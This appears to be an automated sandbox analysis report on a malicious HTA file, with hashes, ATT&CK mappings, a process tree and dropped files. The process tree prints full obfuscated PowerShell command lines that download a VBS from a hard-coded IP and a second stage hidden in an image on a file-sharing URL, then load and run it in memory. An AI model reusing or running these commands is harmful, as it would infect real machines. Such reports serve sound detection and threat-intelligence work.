8681e7cda9d182dc17e7fae70fde1eb13376b027190c34067dbdf6ce75345985

General

Target

goodofrmybestthingstogiveubestofthingsgood.hta
Size

14KB
MD5

d971c9a913293c3ba364138f8d331654
SHA1

1f9ea3c21fcc01fd72ddf75dab0ad971a4ad9ee4
SHA256

8681e7cda9d182dc17e7fae70fde1eb13376b027190c34067dbdf6ce75345985
SHA512

b13892d5b800f1d366c96d14918e04582a4e04e915ca02c7fd6cdbb879f3f3a1fea91cf96e183f7887c761a1dfc6a6300755f61caa0e630435a3d61d85acc9e3
SSDEEP

48:3TTyx915hfpi04Tyx915hGpi0V4zifG99DdsEwYKTcDQEnTyx915htTyx915hUdE:fgdpCgwp8ziufqEwYK4Tg3g+pPg5

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2528	powershell.exe
6	2284	powershell.exe
7	2284	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2528	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2284	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2528	powershell.exe
2284	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2280 wrote to memory of 3068	2280	mshta.exe	29
PID 2280 wrote to memory of 3068	2280	mshta.exe	29
PID 2280 wrote to memory of 3068	2280	mshta.exe	29
PID 2280 wrote to memory of 3068	2280	mshta.exe	29
PID 3068 wrote to memory of 2528	3068	cmd.exe	31
PID 3068 wrote to memory of 2528	3068	cmd.exe	31
PID 3068 wrote to memory of 2528	3068	cmd.exe	31
PID 3068 wrote to memory of 2528	3068	cmd.exe	31
PID 2528 wrote to memory of 2840	2528	powershell.exe	32
PID 2528 wrote to memory of 2840	2528	powershell.exe	32
PID 2528 wrote to memory of 2840	2528	powershell.exe	32
PID 2528 wrote to memory of 2840	2528	powershell.exe	32
PID 2840 wrote to memory of 2696	2840	csc.exe	33
PID 2840 wrote to memory of 2696	2840	csc.exe	33
PID 2840 wrote to memory of 2696	2840	csc.exe	33
PID 2840 wrote to memory of 2696	2840	csc.exe	33
PID 2528 wrote to memory of 2756	2528	powershell.exe	35
PID 2528 wrote to memory of 2756	2528	powershell.exe	35
PID 2528 wrote to memory of 2756	2528	powershell.exe	35
PID 2528 wrote to memory of 2756	2528	powershell.exe	35
PID 2756 wrote to memory of 2284	2756	WScript.exe	36
PID 2756 wrote to memory of 2284	2756	WScript.exe	36
PID 2756 wrote to memory of 2284	2756	WScript.exe	36
PID 2756 wrote to memory of 2284	2756	WScript.exe	36

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\goodofrmybestthingstogiveubestofthingsgood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C poWErsHElL -EX BYpAss -nOp -W 1 -C DevICEcrEdENtIAlDEpLOYMEnt ; iEx($(iex('[SyStEm.TExt.ENCodING]'+[CHar]0x3A+[chaR]58+'Utf8.geTStrinG([sYstem.cOnVerT]'+[cHAr]0X3A+[cHaR]58+'FRomBAsE64StRiNG('+[char]0X22+'JGtUOHphTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CZXJkZWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1vbi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIRlpzY2xZaE1zLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHljUVNQcXcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVZxQlNzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5enEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmYUxMYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRVNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGtUOHphTDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzU0LjM3LjEzMS4yNDAvMTE0L2dvb2RvZnJteWJlc3R0aGluZ3N0b2dpdmV1YmVzdG9mdGhpbmdzZ29vZC5nSUYiLCIkZW52OkFQUERBVEFcZ29vZG9mcm15YmVzdHRoaW5nc3RvZ2l2ZXViZXN0b2Z0aGluZ3Nnb28udmJzIiwwLDApO1N0QVJ0LVNMRUVwKDMpO0lOdk9rRS1pdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxnb29kb2ZybXliZXN0dGhpbmdzdG9naXZldWJlc3RvZnRoaW5nc2dvby52YnMi'+[CHAr]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWErsHElL -EX BYpAss -nOp -W 1 -C DevICEcrEdENtIAlDEpLOYMEnt ; iEx($(iex('[SyStEm.TExt.ENCodING]'+[CHar]0x3A+[chaR]58+'Utf8.geTStrinG([sYstem.cOnVerT]'+[cHAr]0X3A+[cHaR]58+'FRomBAsE64StRiNG('+[char]0X22+'JGtUOHphTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CZXJkZWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1vbi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIRlpzY2xZaE1zLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHljUVNQcXcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVZxQlNzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5enEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmYUxMYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRVNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGtUOHphTDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzU0LjM3LjEzMS4yNDAvMTE0L2dvb2RvZnJteWJlc3R0aGluZ3N0b2dpdmV1YmVzdG9mdGhpbmdzZ29vZC5nSUYiLCIkZW52OkFQUERBVEFcZ29vZG9mcm15YmVzdHRoaW5nc3RvZ2l2ZXViZXN0b2Z0aGluZ3Nnb28udmJzIiwwLDApO1N0QVJ0LVNMRUVwKDMpO0lOdk9rRS1pdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxnb29kb2ZybXliZXN0dGhpbmdzdG9naXZldWJlc3RvZnRoaW5nc2dvby52YnMi'+[CHAr]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\klgugufu.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2840
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES33BE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC33BD.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2696
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodofrmybestthingstogiveubestofthingsgoo.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2756
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAG8AZwBzAGcAbgBpAGgAdABmAG8AdABzAGUAYgB1AGUAdgBpAGcAbwB0AHMAZwBuAGkAaAB0AHQAcwBlAGIAeQBtAHIAZgBvAGQAbwBvAGcALwA0ADEAMQAvADAANAAyAC4AMQAzADEALgA3ADMALgA0ADUALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMQAwADAAOAAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AagB6AHcARQBIAEEASgBQAHgASwBMAEwAegBnAFoARgBoAFkAVgBBAFEATQBBAE8ARQBOAEgAMQBRAHcAdgA4AGEAcwBFAG4ANAAzAHIATgBIADgAdwBPAGcAcQB4AGcATABOADUAeQBnAGcARQBLAGgAOQBFAGcAQQA5ADcARwBnAGMATABYAFEAZwAmAHAAawBfAHYAaQBkAD0AMwA0ADIAOAAwADMAZAAxAGMAYwA0AGUAMwBiADgAMAAxADcAMwA4ADgAOAAyADQAOQA1AGIANQBmAGUAOQBkACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES33BE.tmp

Filesize
1KB

MD5
7a1fb51ff0a675d90a2c93a4de14dc42

SHA1
2cd8e8db73b6d48b13b5cad9a07f27a596770ca5

SHA256
a98967d1faf71d73508b191e95d763180ca2bd3df0d369753e8a69adc554dbdc

SHA512
4a9710b30ecb98207b18f3f310cb2e8cdb1bd2a345b92e3e87cda742925d981853090b3272cd6ea901e0aa84813f15b21470eb2ad2e9fa33fd61030a243b7058

Download Submit
C:\Users\Admin\AppData\Local\Temp\klgugufu.dll

Filesize
3KB

MD5
f826a85084c38dd5c4cf1ec787e9c10c

SHA1
eae459cc8f531e1104ae29322d850c882080e961

SHA256
ab8c0b9c315bcd38c23220cabe62047a0194f3e5b7cd3f443a1da2a53f9e3e6e

SHA512
395e083574464d494464673226eed6d95d963941b9ee2c373fd5123fa5b485a822fceffa757d8f0c4e594f2e47a7c4299b42ede247416db141a80e043579a918

Download Submit
C:\Users\Admin\AppData\Local\Temp\klgugufu.pdb

Filesize
7KB

MD5
79c79876ab794f27168e501d3c6d8cc5

SHA1
8694fe4a6c021742e29d555ef1ab524995fe6eba

SHA256
6c9f1445f05cf15abc025c7e4aedfffe2d81a3698712c4b12f5e22f7a5400b7e

SHA512
22ed62a226f13c1e088b05d7f6a431f2bc4d7504fcac4187f22bdd5eb03c6ff296bfe62db86e186e7299cdd53ac54ca819be9709fc241aa2263ed83d951c8c2c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
ced31a8a0fb51185e8b5583cd13d7627

SHA1
7ad8427477414605f31cd9041b32f46b83292833

SHA256
915411b563895a67a0af0ae9acbda831c402eeccf502bc73814037b1639ff20b

SHA512
16109dbcd6d816511f608318dda068b5625dd5fbe417de687ec9b48eb926b9741efbf60c7ca701f598f83b2eddcb952a572ea221218570e7ccd167f7ecfea649

Download Submit
C:\Users\Admin\AppData\Roaming\goodofrmybestthingstogiveubestofthingsgoo.vbs

Filesize
202KB

MD5
3023f9829200c7185da1975e3e2be6e7

SHA1
ff499cdaa1c862f3e1103bc37ac2a4ca387c1aa1

SHA256
d3fe56f9f749be21644a978011b1dbc4175f9be3091ed881aacf981afb40944a

SHA512
77b978a75cf2ee24574ed02509346e81355be471f6054288946e8aca3639582af06053e6a0340c0cd6028cc894282ce2be32731719d67c47397aed68e9c6596c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC33BD.tmp

Filesize
652B

MD5
7f2c04e932e4c83348bf156f278e24e1

SHA1
4730d87ee7b693d786b4e7f97d5265d205ebc094

SHA256
7da1eefd27fcb786cfe608ead289cd4b74a07423d306b9e0422103a43022b4b0

SHA512
3096692c25abdaac3805857217c28b5d756ff0cc534055f5c5e403b5eb03db2624b1ee030716932186a82a4a739079dc2241cbd7d8c994f04c8db898ab2f0fe9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\klgugufu.0.cs

Filesize
472B

MD5
9a5de27bd2823c1914cc224bd0255a24

SHA1
e0997163b8c055bbdcea2ee92010cb701d69ead5

SHA256
5f131f7f50dfd4bece756bfa64f0f395c8c0d29e86ef47a501e90a341a882d17

SHA512
ed90e6cb6ed8655b2973e90cb72fc5d795e263de770db5c50273dc18b6a82e801b78cc1d68934be601c93af3b5ef80ad4fff52579f01ba3abd9dcbd83eb7ac99

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\klgugufu.cmdline

Filesize
309B

MD5
e3feacc0ffb2f78ccc754b954b17ffe1

SHA1
184bc4f5409587183b506791015e21cf4d8e5301

SHA256
80f65b492bbca0b2730889489f752c01ef499d865de7d7e3491e69d4b98aaf6e

SHA512
6aa476c2447ba28c5b2879635cd7528e79b88aa9a2477754a3a4cbaa7fd1c50b7e31c8298b73fc3fe8b738d1a976621c89ebec331aefc69e723be468261cf213

Download Submit

Analysis

Sharing